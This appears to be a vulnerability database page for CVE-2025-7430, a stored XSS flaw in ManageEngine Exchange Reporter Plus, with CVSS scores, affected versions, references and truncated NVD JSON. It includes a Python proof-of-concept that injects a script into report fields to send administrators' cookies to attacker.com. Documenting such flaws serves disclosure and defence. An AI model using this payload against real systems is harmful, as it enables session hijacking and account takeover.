CVE-2025-7430

Description

Zohocorp ManageEngine Exchange Reporter Plus versions 5723 and below are vulnerable to the Stored XSS Vulnerability in the Folder Message Count and Size report.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5700:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5701:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5702:*:*:*:*:*:* - VULNERABLE

ManageEngine Exchange Reporter Plus <= 5723

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-7430 PoC - Stored XSS in ManageEngine Exchange Reporter Plus
# Target: ManageEngine Exchange Reporter Plus <= version 5723

TARGET_URL = "http://target:8080"
USERNAME = "low_privilege_user"
PASSWORD = "password"

session = requests.Session()

# Step 1: Login to obtain session
login_url = f"{TARGET_URL}/api/v1/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

response = session.post(login_url, json=login_data)
if response.status_code != 200:
    print("[-] Login failed")
    exit(1)

print("[+] Successfully logged in")

# Step 2: Create malicious Folder Message Count and Size report with XSS payload
create_report_url = f"{TARGET_URL}/api/v1/reports/folder-message-count"

xss_payload = "<script>var img=new Image();img.src='http://attacker.com/log?c='+document.cookie;</script>"

report_data = {
    "reportName": f"Folder Report {xss_payload}",
    "folderPath": "\\ mailbox \\ inbox",
    "description": "Report for testing" + xss_payload,
    "scheduleType": "once"
}

response = session.post(create_report_url, json=report_data)
if response.status_code in [200, 201]:
    print("[+] Malicious report created successfully")
    print(f"[+] XSS payload injected: {xss_payload}")
    print("[+] When admin views this report, cookie will be stolen")
else:
    print(f"[-] Failed to create report: {response.status_code}")
    print(response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-7430
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-7430
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-7430/
[4] VulDB https://vuldb.com/cve/CVE-2025-7430
[5] https://www.manageengine.com/products/exchange-reports/advisory/CVE-2025-7430.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-7430", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2025-11-11T11:15:36.080", "lastModified": "2025-11-21T13:21:54.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine Exchange Reporter Plus versions 5723 and below are vulnerable to the Stored XSS Vulnerability in the Folder Message Count and Size report."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6", "matchCriteriaId": "E192E7F2-B940-4F0D-BA1D-D29799E434B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:-:*:*:*:*:*:*", "matchCriteriaId": "3FC399C6-4299-4744-9FC5-13CFE7478164"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5700:*:*:*:*:*:*", "matchCriteriaId": "E913F3D6-9F94-4130-94FF-37F4D81BAEF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5701:*:*:*:*:*:*", "matchCriteriaId": "34D23B58-2BB8-40EE-952C-1595988335CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5702:*:*:*:*:*:*", "matchCriteriaId": "322920C4-4487-4E44-9C40-2959F478A4FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5703:*:*:*:*:*:*", "matchCriteriaId": "3AD735B9-2CE2-46BA-9A14-A22E3FE21C6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5704:*:*:*:*:*:*", "matchCriteriaId": "014DB85C-DB28-4EBB-971A-6F8F964CE6FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5705:*:*:*:*:*:*", "matchCriteriaId": "5E9B0013-ABF8-4616-BC92-15DF9F5CB359"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5706:*:*:*:*:*:*", "matchCriteriaId": "5B744F32-FD43-47B8-875C-6777177677CD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5707:*:*:*:*:*:*", "matchCriteriaId": "F1BB6EEA-2BAA-4C48-8DA8-1E87B3DE611F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5708:*:*:*:*:*:*", "matchCriteriaId": "D3012C17-87F5-4FFD-B67B-BEFF2A390613"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5709:*:*:*:*:*:*", "matchCriteriaId": "1E33D368-2D81-4C7E-9405-7C0A86E97217"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5710:*:*:*:*:*:*", "matchCriteriaId": "7AA9384F-6401-4495-B558-23E5A7A7528C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5711:*:*:*:*:*:*", "matchCriteriaId": "E492F955-0734-4AE4-A59F-572ADF0CFE75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5712:*:*:*:*:*:*", "matchCriteriaId": "11B71FFC-FD2E-4F84-BB1E-55BCA5B51099"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5713:*:*:*:*:*:*", "matchCriteriaId": "531AFEFB-BBE6-42B2-8D37-B4098324AA87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5714:*:*:*:*:*:*", "matchCriteriaId": "01F80C71-110D-4776-B13F-08FCDE125B81"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5715:*:*:*:*:*:*", "matchCriteriaId": "2A6D8AAD-49B9-4216-9A81-A449A5D5549C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7:5717:*:*:*:*:*:*", "matchCriteriaId": "852DBCE6-B926-4B5B-B8C2-86569355153D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus:5.7: ... (truncated)